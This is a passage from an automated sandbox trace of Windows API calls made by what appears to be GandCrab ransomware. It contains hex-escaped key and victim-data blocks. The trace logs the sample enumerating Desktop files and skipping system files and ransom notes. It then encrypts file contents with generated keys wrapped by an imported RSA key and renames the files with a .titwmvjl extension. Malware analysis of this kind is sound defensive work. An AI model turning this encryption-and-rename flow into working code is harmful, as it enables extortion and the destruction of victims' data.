9\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0089.238] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0089.239] CloseHandle (hObject=0x2ac) returned 1 [0089.239] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.240] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.240] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x22, wMilliseconds=0x22d)) [0089.240] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.240] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0089.240] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0089.241] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\d2ca4a09d2ca4deb61a.lock") returned 75 [0089.241] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vracl0_hrlfrctffeaio\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0089.241] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.241] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.241] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\") returned 51 [0089.241] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\*" [0089.242] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x5037f8 [0089.242] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.242] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0089.242] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.242] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.242] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0089.242] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0089.242] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0089.242] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\d2ca4a09d2ca4deb61a.lock" [0089.242] lstrlenW (lpString=".titwmvjl") returned 9 [0089.242] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\d2ca4a09d2ca4deb61a.lock") returned 75 [0089.242] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.242] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 84 [0089.242] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\d2ca4a09d2ca4deb61a.lock") returned 75 [0089.242] lstrlenW (lpString=".lock") returned 5 [0089.242] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.242] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0089.243] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.243] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.243] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0089.243] lstrcmpW (lpString1="sZ8kphpTDvI.mp3", lpString2=".") returned 1 [0089.243] lstrcmpW (lpString1="sZ8kphpTDvI.mp3", lpString2="..") returned 1 [0089.243] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\", lpString2="sZ8kphpTDvI.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\sZ8kphpTDvI.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\sZ8kphpTDvI.mp3" [0089.243] lstrlenW (lpString=".titwmvjl") returned 9 [0089.243] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\sZ8kphpTDvI.mp3") returned 66 [0089.243] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.243] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\sZ8kphpTDvI.mp3.titwmvjl") returned 75 [0089.243] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\sZ8kphpTDvI.mp3") returned 66 [0089.243] lstrlenW (lpString=".mp3") returned 4 [0089.243] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.243] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0089.244] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0089.244] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.244] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\sZ8kphpTDvI.mp3") returned 66 [0089.244] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\sZ8kphpTDvI.mp3") returned 66 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="desktop.ini") returned 1 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="autorun.inf") returned 1 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="ntuser.dat") returned 1 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="iconcache.db") returned 1 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="bootsect.bak") returned 1 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="boot.ini") returned 1 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="ntuser.dat.log") returned 1 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="thumbs.db") returned -1 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="CRAB-DECRYPT.html") returned 1 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="ntldr") returned 1 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="NTDETECT.COM") returned 1 [0089.244] lstrcmpiW (lpString1="sZ8kphpTDvI.mp3", lpString2="Bootfont.bin") returned 1 [0089.244] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\sZ8kphpTDvI.mp3") returned 66 [0089.244] lstrlenW (lpString=".mp3") returned 4 [0089.244] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.244] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0089.244] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.245] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.245] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\sZ8kphpTDvI.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vracl0_hrlfrctffeaio\\sz8kphptdvi.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0089.245] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.245] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0089.246] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.246] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.246] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0089.247] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.248] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.248] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.248] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0089.248] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.248] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.248] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.248] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.248] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0089.249] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.250] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.250] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.250] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0089.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.250] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.250] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.250] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0089.252] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.252] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503478) returned 1 [0089.252] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.252] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0089.252] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.252] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0089.252] GetLastError () returned 0x0 [0089.252] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.253] CryptDestroyKey (hKey=0x503478) returned 1 [0089.253] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.253] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.253] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.253] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0089.254] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.254] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503578) returned 1 [0089.254] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.254] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0089.254] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.255] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0089.255] GetLastError () returned 0x0 [0089.255] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.255] CryptDestroyKey (hKey=0x503578) returned 1 [0089.255] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.255] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.255] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.255] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.256] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x18e43, lpOverlapped=0x0) returned 1 [0089.262] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffe71bd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.262] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18e43, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x18e43, lpOverlapped=0x0) returned 1 [0089.264] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.264] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0089.266] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.270] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.270] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.270] CloseHandle (hObject=0x2b4) returned 1 [0089.271] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\sZ8kphpTDvI.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vracl0_hrlfrctffeaio\\sz8kphptdvi.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\sZ8kphpTDvI.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vracl0_hrlfrctffeaio\\sz8kphptdvi.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0089.272] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.272] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0089.272] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0089.272] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0089.272] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\", 